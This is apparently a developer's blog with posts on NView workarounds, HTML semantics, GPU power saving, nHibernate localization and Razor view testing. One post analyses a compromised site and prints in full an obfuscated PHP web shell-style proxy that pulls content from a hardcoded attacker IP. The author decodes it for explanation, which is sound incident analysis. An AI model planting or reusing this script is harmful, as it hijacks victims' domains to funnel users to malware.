How to Run NView Desktop Manager on Windows 7 x64

19 June, 2012


As pleasant as working with multiple big screens is, the experience on Windows is quite bare-bones, and most applications lack dual-screen features. Some handle it better than others, but most provide no extra support at all. In my case, the crucial feature is the ability to keep any application always on top: I stretch most apps across both screens, which often prevents me from having windows side by side. There are plenty of tiny utilities for keeping applications always on top, but most of them are old, unsupported, and don't work on Windows 7.

So that’s where a neat little app from NVidia comes in. It is called NView and it is the best desktop manager software in existence. With NView you can:

  • Send any window to any monitor
  • Quickly organize windows across displays
  • Set any window to always stay on top
  • Adjust transparency of any application
Other features include desktop grid, extendable taskbar, desktop profiles, etc.

The bad news is that a) NView Desktop Manager is only available to Quadro card owners, and b) it can only be installed on Windows XP (and Vista, if you are lucky). There is a petition on the NVidia forums to port it to Windows 7, but as far as I can tell, demand isn't big enough for the developers to spend time on it.

The reality, though, is that there is only one major reason why it's not available on Windows 7: a single broken feature concerning the desktop grid. If you are happy to live without it, read on.


So in order to get NView working on Windows 7 32-bit or 64-bit you will need:

1. A GeForce card. Sorry, we are talking about an NVidia application.

2. Windows 7 32-bit or 64-bit.

3. Download NViewActivator.

4. Download the latest Quadro drivers.

5. Run the downloaded Quadro driver installer. It will extract the files and then fail (unless you actually have a Quadro card).

6. Find the folder the drivers were extracted to and drop NViewActivator.exe there. Your folder should look like this.

7. Run NViewActivator.exe. It will open and close very quickly. This is normal.

8. Run setup.exe again; it should now let you proceed as normal. If you have done everything correctly, after installation your screen will look similar to this.

9. Enjoy! To access NView features just right click on any window's title.

I couldn't get all features to work, but most do and that is good enough for me. I sincerely hope this was helpful.

Permanent Link

My Blog Has Received a Little Face Lift

28 February, 2012

This blog has never had any sort of professional design (or what I would call "design") to begin with, which is not necessarily an issue by itself, but I was always annoyed by its chaotic clumsiness:

  • The font-face JavaScript took a whole second to load, and then another moment to re-render half the page, which was very irritating.
  • Blocks did not align with each other and the layout.
  • Droid Sans turned out to be a great font for interfaces, but a horrible font for reading from a screen.
  • Links used a color scheme that screamed "Hey! I'm from the 90's."

There were other things not worth mentioning. It was time to take action, and so I did. Here are the obligatory before and after pictures.



I have also added a Recent Articles block to the left column for easier navigation. Please enjoy!

Permanent Link

Is b tag Deprecated?

21 February, 2012

I often see claims on the Internet by self-proclaimed W3C standards pundits that the <b> tag is deprecated, invalid, evil, and should be replaced with <strong> everywhere possible (and not). The claim is usually supported by an indirect reference to the W3C HTML standard; there is never a direct link, however.

There is one simple reason for this, of course: the <b> tag has never been deprecated, or deemed invalid or non-semantic. In fact, <b> appears in the "Text-level semantics" section of the W3C Recommendations for HTML 5. Let's look at what is perceived as the HTML standard today.

Here is what the HTML 4.01 Recommendation says about b in the "Fonts" section:

Rendering of font style elements depends on the user agent. The following is an informative description only.
B: Renders as bold text style.
Font style elements must be properly nested. Rendering of nested font style elements depends on the user agent.
Interestingly enough the name "B" is surrounded by the <b> tag itself.

The HTML 4 description of the tag is not very descriptive, and the HTML 5 standard clarifies its usage much better:

The b element represents a span of text to which attention is being drawn for utilitarian purposes without conveying any extra importance and with no implication of an alternate voice or mood, such as key words in a document abstract, product names in a review, actionable words in interactive text-driven software, or an article lede.

Knowing this, you still wouldn't be too far off claiming that a particular usage of the tag is invalid, because there are very few practical cases where <b> is valid:

The b element should be used as a last resort when no other element is more appropriate. In particular, headings should use the h1 to h6 elements, stress emphasis should use the em element, importance should be denoted with the strong element, and text marked or highlighted should use the mark element.

The problem is especially tricky in WYSIWYG editors that allow you to make a piece of text bold. Which tag should they pick for this purpose? <strong> is not valid if you want to highlight a company name or most other names, but would mostly be correct in literary works. How would a content management system know, for instance, which meaning a piece of text has? Should it provide two buttons? Or even three, if you include emphasis? That would be extremely confusing to non-technical users, and although helpful to machines and to visitors with disabilities, practically useless for a typical website.

Regardless of semantic meaning, all of these tags can be restyled through CSS, which makes using any of them purely for display purposes completely wrong; for this reason, perhaps WYSIWYG editors should just use a styled <span> tag.
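To illustrate the choice an editor faces, here is a rough sketch in Python (the function, its parameters, and the exact markup are hypothetical, not taken from any real editor): a purely presentational <span> is the safe default, and the semantic tags are emitted only when the user explicitly states an intent.

```python
def wrap_bold(text, semantic=None):
    """Wrap text for bold display.

    A WYSIWYG editor cannot know the author's intent, so by default it
    emits a presentational <span>; <strong> and <b> are used only when
    the user explicitly picks a meaning.
    """
    if semantic == "importance":
        return f"<strong>{text}</strong>"
    if semantic == "attention":
        return f"<b>{text}</b>"
    # purely presentational bold, no semantic claim
    return f'<span style="font-weight: bold">{text}</span>'
```

With this approach `wrap_bold("Acme")` yields the styled span, while `wrap_bold("warning", "importance")` yields a <strong> element; whether exposing that choice to users is worth the confusion is exactly the open question above.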

In any case, the point I am trying to make is simply that the <b> tag is not deprecated or invalid, that it can and should still be used, and that it has as much semantic meaning as its <strong> counterpart.

Permanent Link

Save the Internet from SOPA petition

07 December, 2011

A reminder to everyone concerned about the future of a free and open Internet to sign the online petition, which will be used in congressional hearings to defend against the heavily-lobbied SOPA legislation. Currently sitting at 979,692 signatures, it will hopefully reach 1,500,000 by the end of the week.

This should concern everyone, wherever you live, not just US citizens, since the effect (and the ban hammer the law will introduce) will reach virtually everyone actively engaged with user-submitted content platforms.

Permanent Link

Dual Monitor Power-Saving Mode (Nvidia cards) Fix

30 November, 2011

If you, like me, are one of the developers working with dual monitors on an Nvidia card, you might have noticed increased power consumption and temperature from the video card. The problem is quite common with Nvidia desktop cards, as there is no power-saving mode built in for dual-monitor setups. The card simply stays in high-performance 3D mode all the time, never reverting to 2D clocks as it normally would while idling. This has even been addressed in one of the driver updates:

This is a hardware limitation and not a software bug. Even when no 3D programs are running, the driver will operate the GPU at a high performance level in order to efficiently drive multiple displays. In the case of SLI or multi‐GPU PCs, the second GPU will always operate with full clock speeds; again, in order to efficiently drive multiple displays. Today, all hardware from all GPU vendors have this limitation.

Fortunately, there is a software workaround that does the trick.


1. Download and install Nvidia Inspector Tool (normally used for smart overclocking).

2. Right-click on "Show Overclocking" and select "Start Multi Display Power Saver".

Nvidia inspector dual monitor fix

3. Select the card that you want to fix.

4. Check "Run Multi Display Power Saver at Windows Startup".

Nvidia dual monitor power saving fix

5. Optionally, add applications you want to exclude from power-saving mode and/or enable performance mode when a threshold is met, with P0 being the most performant state and P8 one of the slowest.

The way it works is quite simple: the application forces the video card into its slowest performance state (effectively downclocking it), which in my case means just a 51 MHz GPU clock. It may also cause the card to drop its voltage.

My temperature before applying the fix (idle): 80°C.
Temperature after applying the fix (idle): 48°C.

Plus, it almost halved the card's power consumption.

Permanent Link

Uncovering Hackers' Satellite Network

24 November, 2011

Recently I discovered a traffic spike on an old friend's website. The top content URLs looked very suspicious for a PHP site: /aspnet_client/{x}/{y}. When put into a browser, those URLs produced a whole new website. My first thought was that hackers were hosting their website on my friend's server for free. But quick directory browsing revealed that the "aspnet_client" folder contained just one file, "index.php", and nothing else. The content of the file was:

<? $GLOBALS['_1546482439_']=Array(base64_decode('Y3Vyb' .'F9' .'pbml0'),base64_decode('Y3' .'VybF9zZ' .'XR' .'vc' .'HQ='),base64_decode('' .'Y3Vy' .'bF9zZX' .'Rvc' .'HQ' .'='),base64_decode('Y3VybF' .'9le' .'GV' .'j'),base64_decode('Y3Vyb' .'F9j' .'bG' .'9zZQ' .'=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('aGV' .'hZ' .'GVy'),base64_decode('c3Ryc3R' .'y'),base64_decode('aGV' .'hZG' .'Vy'),base64_decode('' .'c3' .'Ryc3Ry'),base64_decode('' .'c3R' .'y' .'c3Ry'),base64_decode('aGVh' .'ZGV' .'y'),base64_decode('c3R' .'yc3R' .'y'),base64_decode('' .'a' .'G' .'VhZGVy'),base64_decode('aG' .'VhZG' .'V' .'y')); ?><? function _1161828149($i){$a=Array('aWQ=','aHR0cDovLzE4OC4xNDMuMjMyLjEzMS9qb2svYTYv','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx');return base64_decode($a[$i]);} ?><? $_0=$_REQUEST[_1161828149(0)];$_1=$GLOBALS['_1546482439_'][0]();$_2=_1161828149(1) .$_0;$GLOBALS['_1546482439_'][1]($_1,CURLOPT_URL,$_2);$GLOBALS['_1546482439_'][2]($_1,CURLOPT_RETURNTRANSFER,round(0+0.333333333333+0.333333333333+0.333333333333));$_3=$GLOBALS['_1546482439_'][3]($_1);$GLOBALS['_1546482439_'][4]($_1);if($GLOBALS['_1546482439_'][5]($_0,_1161828149(2))){$GLOBALS['_1546482439_'][6](_1161828149(3));}elseif($GLOBALS['_1546482439_'][7]($_0,_1161828149(4))){$GLOBALS['_1546482439_'][8](_1161828149(5));}elseif($GLOBALS['_1546482439_'][9]($_0,_1161828149(6))|| $GLOBALS['_1546482439_'][10]($_0,_1161828149(7))){$GLOBALS['_1546482439_'][11](_1161828149(8));}elseif($GLOBALS['_1546482439_'][12]($_0,_1161828149(9))){$GLOBALS['_1546482439_'][13](_1161828149(10));}else{$GLOBALS['_1546482439_'][14](_1161828149(11));}echo $_3; ?>

So this looks like a typical malicious PHP script. But what does it really do? Well, since it's PHP, the source code is right there, just in obfuscated form. There are a few tools that can decode base64-encoded strings quite easily. Decoding all the encoded strings produced a curious list, giving enough clues to figure out the intentions:

Content-Type: text/css; charset=windows-1251
Content-Type: image/png
Content-Type: image/jpeg
Content-Type: image/gif
Content-Type: text/html; charset=windows-1251
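The decoding step can be reproduced in a few lines of Python; the fragments below are copied verbatim from the script above, concatenated exactly as the PHP code does before calling base64_decode():

```python
import base64

# fragments from the obfuscated script, joined the same way the PHP does
encoded = [
    'Y3Vy' + 'bF9' + 'pbml0',                    # a curl function name
    'Y3' + 'VybF9zZ' + 'XR' + 'vc' + 'HQ=',      # another curl function name
    'aHR0cDovLzE4OC4xNDMuMjMyLjEzMS9qb2svYTYv',  # the remote host being proxied
]

for s in encoded:
    print(base64.b64decode(s).decode('ascii'))
# curl_init
# curl_setopt
# http://188.143.232.131/jok/a6/
```

The decoded curl calls and the hard-coded remote URL are what give the script's intent away.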

Effectively, the script was using cURL to download another website and present it under the victim's domain name. Now that's something I hadn't seen before. Why would anyone do something like that?

It turned out the malicious website hosted links to another website, disguised as links to pirated educational materials; that site in turn hosted malicious software under the same pretence.

But that doesn't answer the question of why. A quick investigation revealed hundreds of websites hacked in a similar manner, each with slightly different pages hosted on it, but all ultimately leading to the same file-hosting domain.

Effectively, these hackers built a network of satellite websites, each grabbing a portion of search traffic and leading users into a pit full of digital fire. Having built such a massive network, the possibilities are endless, with the most obvious uses in the area of SEO.

A query to the hosting company revealed that the initial script was planted through a bug in an old phpMyAdmin installation that had been lying around untouched since 2005. D'oh! Those were the days, when hosting companies did not bother to package software for you and only gave out MySQL and FTP passwords; the rest was up to you to figure out. Oh, and you couldn't put files outside of the public directory. Fun times.

Permanent Link

Internationalization with nHibernate

28 April, 2011

For many years I have been trying to come up with a solution that would allow me to attach textual data to my database objects and have it queried based on the current culture. The solution I am going to demonstrate here can be a little hard to comprehend at first, but it is very easy to use, and with a properly nHibernate-backed database it allows rapid development of culture-based data storage.

Mind you, all of our database is built from mappings, so once we add locale data to an object, the appropriate table is created automatically; developers truly never have to worry about the backing storage, as long as nHibernate supports it. We are also using sharpArchitecture, so you will see some references to it in the code.

OK, so let's start with the interfaces. First we need an object that will store our data. As it has a many-to-one relationship with its parent, we can define the following:

public interface ILocaleStorage<TParent, TLocaleId> : IEntityWithTypedId<TLocaleId>
{
	int Culture { get; set; }
	DateTime Updated { get; set; }
	TParent Parent { get; set; }
}

This is just an interface for entities with added Culture, last updated time and reference to the parent (must have that for proper nHibernate support).

The next interface is for the parent entity; essentially it just ensures that our parent indeed has a reference to the locale storage.

Note: IEntityWithTypedId<T> is from sharpArchitecture.

public interface IEntityWithLocaleStorage<TLocale, TId> : IEntityWithTypedId<TId>
{
	IList<TLocale> Locale { get; set; }
}

Now we need a base implementation of the ILocaleStorage<,> interface which other entities can use (not strictly necessary, but it saves some lines of code).

public class LocaleStorage<TParent, TLocaleId> : EntityWithTypedId<TLocaleId>, ILocaleStorage<TParent, TLocaleId>
{
	public virtual int Culture { get; set; }
	public virtual DateTime Updated { get; set; }
	public virtual TParent Parent { get; set; }
}

Most of the magic happens in the next definition, a base implementation of the IEntityWithLocaleStorage<,> interface. This can be hard to understand if you are not very familiar with generics.

public class EntityWithLocaleStorage<T, TLocale, TId, TLocaleId> : EntityWithTypedId<TId>,
        IEntityWithLocaleStorage<TLocale, TId>
        where TLocale : class, ILocaleStorage<T, TLocaleId>, new()
        where T : EntityWithLocaleStorage<T, TLocale, TId, TLocaleId>

What's going on here? Going type by type:
T - the type that is going to inherit from EntityWithLocaleStorage<,,,>, the same as this.GetType(), hence the self-referencing type constraint
TLocale - the type that implements ILocaleStorage<,>; this is where your culture-based data is stored
TId - the type of the id of T
TLocaleId - the type of the id of TLocale

So far there is no use for any of those monstrosities, so let's add one. First, add a basic constructor to initialize the one-to-many collection.

public virtual IList<TLocale> Locale { get; set; }

public EntityWithLocaleStorage()
	: base()
{
	Locale = new List<TLocale>();
}

Second, provide a mechanism for inheriting classes to correctly retrieve objects from the store.

protected TLocale GetLocale(bool setter)
{
	if (Locale.Count == 1
		&& (!setter || Thread.CurrentThread.CurrentCulture.LCID == Locale[0].Culture))
		return Locale[0];

	if (Locale.Count > 1)
	{
		var result = Locale.Where(x => x.Culture == Thread.CurrentThread.CurrentCulture.LCID).FirstOrDefault();
		if (result != null)
			return result;
	}

	if (Locale.Count == 0)
		Locale.Add(new TLocale { Culture = 1033, Parent = (T)this });
	else if (setter)
		Locale.Add(new TLocale { Culture = Thread.CurrentThread.CurrentCulture.LCID, Parent = (T)this });
	else
		return Locale.Where(x => x.Culture == 1033).FirstOrDefault();

	return GetLocale(setter);
}

As you can see, GetLocale(bool) returns the data associated with the only locale in the database if there is just one and either you are not writing or it matches the current culture. If there is more than one, it finds the row with the matching culture code. Failing that, a row for the current culture is automatically added to the database and returned (when writing), or the default-culture row is returned. The "setter" parameter is there to prevent locale data from being created when you don't want it to be.
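The fallback rules are language-agnostic, so here is a minimal Python sketch of the same algorithm (the function and the dict-based rows are illustrative only, not part of the C# code above); 1033 is the LCID of the default en-US culture:

```python
DEFAULT_LCID = 1033  # en-US

def get_locale(locales, current_lcid, setter):
    # a single row is reused as-is unless a write needs a row
    # for a different culture
    if len(locales) == 1 and (not setter or locales[0]['culture'] == current_lcid):
        return locales[0]
    # otherwise try to match the current culture exactly
    for row in locales:
        if row['culture'] == current_lcid:
            return row
    if not locales:
        # empty collection: create the default-culture row
        locales.append({'culture': DEFAULT_LCID})
    elif setter:
        # writing: create a row for the current culture on demand
        locales.append({'culture': current_lcid})
    else:
        # reading with no matching row: fall back to the default culture
        return next(r for r in locales if r['culture'] == DEFAULT_LCID)
    return get_locale(locales, current_lcid, setter)
```

For example, writing under French (1036) when only the en-US row exists appends a 1036 row and returns it, while reading under 1036 falls back to the 1033 row without touching the collection.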

Now, on to real-world examples.

public class Profile : EntityWithLocaleStorage<Profile, ProfileLocale, int, int>
{
	public Profile()
		: base()
	{
	}

	[IgnoreDuringDatabaseMapping]
	public virtual string Biography
	{
		get { return GetLocale(false).Biography; }
		set { GetLocale(true).Biography = value; }
	}

	[IgnoreDuringDatabaseMapping]
	public virtual string AuthorName
	{
		get { return GetLocale(false).AuthorName; }
		set { GetLocale(true).AuthorName = value; }
	}
}

public class ProfileLocale : LocaleStorage<Profile, int>
{
	public virtual string Biography { get; set; }
	public virtual string AuthorName { get; set; }
}

Note: [IgnoreDuringDatabaseMapping] ensures that these properties are not picked up by Fluent nHibernate. Also, notice how the setters call GetLocale with "setter" set to true, and the getters with false? This ensures that users see either their own culture (if there is data for it) or the default, but can never create an empty row just by requesting a page.

After that is set up, all that's left is a few Fluent mapping overrides. We also allow wiki-style versioning for our locales, so our mappings include that as well.

public class ProfileMap : IAutoMappingOverride<Profile>
{
	public void Override(AutoMapping<Profile> mapping)
	{
		mapping.HasMany(x => x.Locale).Inverse()
			.OrderBy("Updated DESC")
			.ApplyFilter<CultureFilter>();
	}
}

public class ProfileLocaleMap : IAutoMappingOverride<ProfileLocale>
{
	public void Override(AutoMapping<ProfileLocale> mapping)
	{
		mapping.References(x => x.Parent);
		mapping.Map(x => x.Culture);
		mapping.Version(x => x.Updated).CustomSqlType("timestamp").Generated.Never();
		mapping.CompositeId().KeyProperty(x => x.Parent, "parent_id").KeyProperty(x => x.Culture, "culture");

		mapping.Map(x => x.Biography).CustomSqlType("TEXT");
	}
}

Another magical part here is .ApplyFilter<CultureFilter>(), which applies an nHibernate filter to the collection. Note: refer to this blog post if you are getting an exception about a filter-def not being used anywhere.

public class CultureFilter : FilterDefinition
{
	public CultureFilter()
	{
		WithName("CultureFilter").WithCondition("(:Culture = Culture OR 1033 = Culture)").AddParameter("Culture", NHibernateUtil.Int32);
	}
}

Note: 1033 is the LCID of the en-US culture. This filter effectively limits the collection to two elements: the rows corresponding to the current and default cultures. The code above should work without the filter too.

This filter can be enabled like so:

NHibernateSession.Current.EnableFilter("CultureFilter").SetParameter("Culture", Thread.CurrentThread.CurrentCulture.LCID);

That's it. The Profile object now has culture-based data attached to it, accessible by simply calling Profile.Biography. Data is retrieved based on either the current or the default en-US culture. If you then choose to edit the data, it is always saved to your current culture, even if there was previously no corresponding row in the database.

I hope this little article helps developers working with nHibernate and struggling with i18n designs.

Permanent Link

Why Australian Unis Will Not Teach You How To Program

07 April, 2011

Undergraduate education is highly standardized in every country and follows the same patterns over and over. The format has hardly changed in many years; well, except that maybe it got a little less mundane with new technology, with downloadable lecture notes and videos. And it still works for most professions out there; as they say, "university teaches you how to educate yourself" (although, to be fair, no one ever teaches you how to do exactly that; they just throw everyone out "into the wild" and ask questions later). It works to some degree in the CompSci theory department too, but when it comes to application, the education system crumbles.

I don't mean programming in its simplest form here (aka "coding") - that can surely be self-taught. Applying theoretical knowledge is the missing skill: there is just no methodology for going from abstract concepts, so overwhelmingly poured into your head at uni, to that piece of legacy CRM system you are desperately trying to improve.

It is only after going through a million similar problems, acquiring years of experience, and then rediscovering things you were already once taught, that you can make a connection between what you once learned and the problem at hand.

What are you usually taught at uni? You learn some theory, then you learn a programming language and how to code simple things, then you keep learning theory, and you keep learning how to code slightly less simple things (if you are lucky you will have a class with a combination of both). And then you graduate after taking 24 classes, of which half were there just to fill the gaps.

How are the classes run? Well, you have a lecture, followed by a tutorial, followed by a practical, followed by an assignment or two, the latter implying the use of bits of material learned previously in the course. There is no problem identification and resolution in that. You are always guaranteed to know that the solution is in the textbook and that at some very recent point in the past you have seen it. In real life that point in the past will be very far away, and you need an absolutely inhuman brain capacity to recover that knowledge at the right moment.

However, if you flip that structure: if you learn how to code first (for which you don't even need to know what a computer is), then try to implement complex projects and ultimately fail, it is only at that point that theory and science can come in and provide the missing pieces that you were lacking but never knew existed. This way, problems are presented before solutions, just as they are in the real world.

How do we learn when we really want to learn something? We read and practice at the same time; we come up with things to do with our newly acquired knowledge. We don't just shelve it in hopes of using it later; we use it straight away, in a manner we see fit for ourselves. You cannot just come up with a project and do it at uni. Why not? Grades. It is downright impossible to grade pet projects, since there are no set requirements (which would destroy the whole idea of having a project to practice on) and no marking criteria.

But why are there grades at uni in the first place? Who really needs students' artificial works of learning to be graded? Do grades indicate learning progress? Nope; they only indicate your ability to, well, acquire good grades. There is no practical feedback in grades, so students don't need them. Unis need grades for one major reason: demonstrable quality of their education. It's something to show to employers: hey, we fail people who don't do anything, and we reward people who do exactly what they are told. Will they fail in a non-supervised environment? No one can ever tell. Even employers don't look at grades. How many of you have had to present your grades to an employer? I bet the number is close to 0. Americans just show off their grade averages, a 100% useless statistic.

It's a shame. Most good things that students do at unis come out of after-hours projects, with no grades, almost no supervision, and no hard-set plan. Australian unis rarely offer anything like that. Oh, you can go to the gym; that's included, though.

Honestly, I have no solution for this. Just ditching grading altogether will not magically work, and changing educational plans requires titanic effort. But if you do want to leave uni with something, play with every bit of knowledge you get there. Those boring sorting algorithms? Sort all the files on your PC; you have a hundred thousand of those. Learned about a dozen path-finding algorithms? Write a game. Run pet projects, collaborate, ask around: you'll need it all at some point. Studying for assignments and tests is only great if you want to train your short-term memory.

Permanent Link

Unit Testing Razor Views

08 March, 2011

When ASP.NET MVC 3's new Razor view engine was first announced, it was presented as being unit-testable (to the extent views can be unit-tested at all); however, there is still no sensible guide on how to actually achieve that. It is unclear to me what the approach intended by the MVC team is, so I had to create my own set of helper methods to test my views, or to put it better, to render them without a running web server. The task wasn't easy, and frankly it doesn't make much sense, since there is no thoughtful background to it, just a lot of digging inside the MVC 3 sources.

How to use it

Using the helper is dead easy in most cases: all you have to do is specify the type of your model, the model object itself and the path to your view.

string result = RazorHelper<Client>
		.GenerateAndExecuteTemplate(@"..\..\..\..\..\app\Northwind.Web\Views\Client\Profile.cshtml", client)
		.Text;

The helper will compile the template, insert the model, and run it, returning the result as a string. All partial views and the layout will be ignored (since we are unit testing).

GenerateAndExecuteTemplate method comes in 3 overloads:

public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model)
public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model, HttpContextBase httpContext)
public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model, HttpContextBase httpContext, Action<WebViewPage<T>> modifyViewBag)

The latter two allow you to insert a mocked HttpContextBase and/or modify the ViewBag of the resulting page before execution. This can be useful in cases where your views step outside of your model, or are completely model-less (in which case just specify object for type T). One thing to remember is that your view must use the @model keyword, or the templating engine will not be able to determine the model type.

Source Code

Feel free to modify and use the source however you want. I very much doubt I will keep using it for long myself, since testability of Razor views was an announced feature of MVC 3 and we are likely to see official examples in the next couple of months.

public class RazorViewExecutionResult
{
	public string Text { get; set; }
	public IList<string> SectionNames { get; private set; }

	public RazorViewExecutionResult()
	{
		SectionNames = new List<string>();
	}
}

public static class RazorHelper<T>
{
	public static RazorViewExecutionResult GenerateAndExecuteTemplate(string templateName, T model)
	{
		return GenerateAndExecuteTemplate(templateName, model, null, null);
	}

	public static RazorViewExecutionResult GenerateAndExecuteTemplate
		(string templateName, T model, HttpContextBase httpContext)
	{
		return GenerateAndExecuteTemplate(templateName, model, httpContext, null);
	}

	public static RazorViewExecutionResult GenerateAndExecuteTemplate
		(string templateName, T model, HttpContextBase httpContext, Action<WebViewPage<T>> modifyViewBag)
	{
		string view = File.ReadAllText(templateName);
		var template = RazorHelper<T>.GenerateTemplate(view);
		if (modifyViewBag != null)
			modifyViewBag(template);
		var result = RazorHelper<T>.ExecuteTemplate(template, model, httpContext);
		return result;
	}

	private static RazorTemplateEngine SetupRazorEngine()
	{
		// Set up the hosting environment (the filename here is only used to trick RazorTemplateEngine)
		var host = new MvcWebPageRazorHost("~/test.cshtml", System.Environment.CurrentDirectory);
		// TODO: add your namespaces here
		// Create the template engine using this host
		return new RazorTemplateEngine(host);
	}

	public static RazorViewExecutionResult ExecuteTemplate(WebViewPage<T> viewPage, T model)
	{
		return ExecuteTemplate(viewPage, model, null);
	}

	public static RazorViewExecutionResult ExecuteTemplate(WebViewPage<T> viewPage, T model, HttpContextBase httpContext)
	{
		var result = new RazorViewExecutionResult();
		// Warning: lots of mocking below

		// mock HTTP state objects
		var context = MockRepository.GenerateMock<HttpContextBase>();
		context.Expect(x => x.Items).Return(new Dictionary<object, object>());
		var response = MockRepository.GenerateMock<HttpResponseBase>();
		response.Expect(x => x.ApplyAppPathModifier("")).IgnoreArguments().Repeat.Any()
			.WhenCalled(x => { x.ReturnValue = x.Arguments[0]; });
		context.Expect(x => x.Response).Repeat.Any().Return(response);
		var request = MockRepository.GenerateMock<HttpRequestBase>();
		context.Expect(x => x.Request).Repeat.Any().Return(request);
		request.Expect(x => x.ApplicationPath).Repeat.Any().Return("/");
		request.Expect(x => x.IsLocal).Repeat.Any().Return(true);
		var requestRouteContext = new RequestContext(context, new RouteData());
		// mock page view context
		var view = MockRepository.GenerateMock<ViewContext>();
		var mock = new MockRepository();
		view.Expect(x => x.HttpContext).Repeat.Any().Return(context);
		var viewMock = MockRepository.GenerateMock<IView>();
		view.Expect(x => x.View).Repeat.Any().Return(viewMock);
		view.Expect(x => x.TempData).Repeat.Any().Return(new TempDataDictionary());
		view.Expect(x => x.ViewData).Repeat.Any().Return(new ViewDataDictionary<T>(model));
		// mock view data used by the page
		var viewDataContainer = MockRepository.GenerateMock<IViewDataContainer>();
		viewDataContainer.Expect(c => c.ViewData).Repeat.Any().Return(new ViewDataDictionary<T>(model));
		// mock html helper
		var html = mock.DynamicMock<HtmlHelper<T>>(view, viewDataContainer);
		var urlHelper = MockRepository.GenerateMock<UrlHelper>(requestRouteContext);
		// mock view engine (for fake resolution of partial views)
		var viewEngine = MockRepository.GenerateMock<IViewEngine>();
		viewEngine.Expect(x => x.FindPartialView(null, null, false)).IgnoreArguments()
			.Repeat.Any().Return(new ViewEngineResult(viewMock, viewEngine));

		using (var tw = new StringWriter())
		using (var twNull = new StringWriter()) // this writer is used to discard unnecessary results
		{
			view.Expect(x => x.Writer).Repeat.Any().Return(tw);

			// inject mocked context
			viewPage.Context = httpContext;

			var pageContext = new WebPageContext(context: context, page: null, model: null);
			viewPage.ViewContext = view;
			if (model != null)
				viewPage.ViewData = new ViewDataDictionary<T>(model);
			viewPage.Html = html;
			viewPage.Url = urlHelper;
			// insert the mocked viewEngine for fake partial view resolution
			ViewEngines.Engines.Clear();
			ViewEngines.Engines.Add(viewEngine);

			// prepare the view for execution, discarding all generated results
			viewPage.PushContext(pageContext, twNull);
			viewPage.ExecutePageHierarchy(pageContext, twNull);
			// inject the real textwriter and execute the compiled page
			viewPage.PushContext(pageContext, tw);
			viewPage.ExecutePageHierarchy();

			// find all sections and render them too
			PropertyInfo dynMethod = pageContext.GetType().GetProperty("SectionWritersStack", BindingFlags.NonPublic | BindingFlags.Instance);
			var res = (Stack<Dictionary<string, SectionWriter>>)dynMethod.GetValue(pageContext, null);
			foreach (var section in res.Peek())
			{
				result.SectionNames.Add(section.Key);
				section.Value(); // renders the section into the current writer
			}

			result.Text = tw.ToString();
			return result;
		}
	}

	public static WebViewPage<T> GenerateTemplate(string input)
	{
		WebViewPage<T> result = null;
		var _engine = SetupRazorEngine();

		// Generate code for the template
		GeneratorResults razorResult = null;
		Regex layout = new Regex("Layout = .*");
		input = layout.Replace(input, string.Empty); // layouts cannot be rendered in a unit test environment
		using (TextReader rdr = new StringReader(input))
			razorResult = _engine.GenerateCode(rdr);

		var codeProvider = new CSharpCodeProvider();

		// generate C# code
		using (var sw = new StringWriter())
			codeProvider.GenerateCodeFromCompileUnit(razorResult.GeneratedCode, sw, new CodeGeneratorOptions());

		var compParams = new CompilerParameters(new string[] {
				typeof(RazorHelper<>).Assembly.CodeBase.Replace("file:///", "").Replace("/", "\\")
				// TODO: add your assemblies here
		});
		compParams.GenerateInMemory = true;
		compParams.IncludeDebugInformation = true;

		// Compile the generated code into an assembly
		CompilerResults results = codeProvider.CompileAssemblyFromDom(compParams, razorResult.GeneratedCode);

		if (results.Errors.HasErrors)
		{
			CompilerError err = results.Errors
									   .OfType<CompilerError>()
									   .First(ce => !ce.IsWarning);
			throw new HttpCompileException(String.Format("Error Compiling Template: ({0}, {1}) {2}",
										  err.Line, err.Column, err.ErrorText));
		}

		// Load the assembly
		Assembly asm = results.CompiledAssembly;
		if (asm == null)
			throw new HttpCompileException("Error loading template assembly");

		// Get the template type
		Type typ = asm.GetType("ASP._Page_test_cshtml"); // remember the fake filename?
		if (typ == null)
			throw new HttpCompileException(string.Format("Could not find type ASP._Page_test_cshtml in assembly {0}", asm.FullName));

		result = Activator.CreateInstance(typ) as WebViewPage<T>;
		if (result == null)
			throw new HttpCompileException("Could not construct the template or it does not inherit from WebViewPage<T>");

		return result;
	}
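For context, here is a usage sketch of GenerateTemplate; the Person model and the template string are hypothetical, and error handling is omitted:

```csharp
// Hypothetical model; any POCO with the properties the template uses will do.
public class Person
{
    public string Name { get; set; }
}

// Compile a Razor string into a page instance; the page can then be
// rendered against a model using the mocked-context helper above.
WebViewPage<Person> page = RazorHelper<Person>.GenerateTemplate("<p>Hello, @Model.Name!</p>");
```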

Localizing Fluent NHibernate, Workaround for filter-def Exception

02 April, 2010

Update: this bug has since been fixed, although my bug report was originally dismissed, only to be raised again by Ayende. So much for the "open" in open source. Oh well. Meanwhile, I have come up with a better solution for i18n, available in my blog post here.

For those of you trying to use localization with NHibernate as suggested by Ayende Rahien and getting an NHibernate exception:

filter-def for filter named 'CultureFilter' was never used to filter classes nor collections.

The solution is obvious: use it to filter a class or a collection. If you are using Fluent NHibernate like I am, just put in something like this:

public class CultureFilter : FilterDefinition
{
    public CultureFilter()
    {
        WithName("CultureFilter")
            .WithCondition("Id > 0")
            .AddParameter("Culture", NHibernateUtil.Int32);
    }
}

And then apply it to any mapping:


The best way is to put it on a HasMany collection anywhere in your mappings; SQL can then be used normally in Map(..).Formula("").
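For illustration, attaching the filter to a collection might look something like this (the entity and property names are made up; ApplyFilter is the Fluent NHibernate method for attaching a named filter to a collection):

```csharp
// Hypothetical mapping: Product and Translations are illustrative names.
public class ProductMap : ClassMap<Product>
{
    public ProductMap()
    {
        Id(x => x.Id);
        // attaching the filter here is what makes the filter-def "used",
        // which silences the exception above
        HasMany(x => x.Translations)
            .ApplyFilter<CultureFilter>();
    }
}
```

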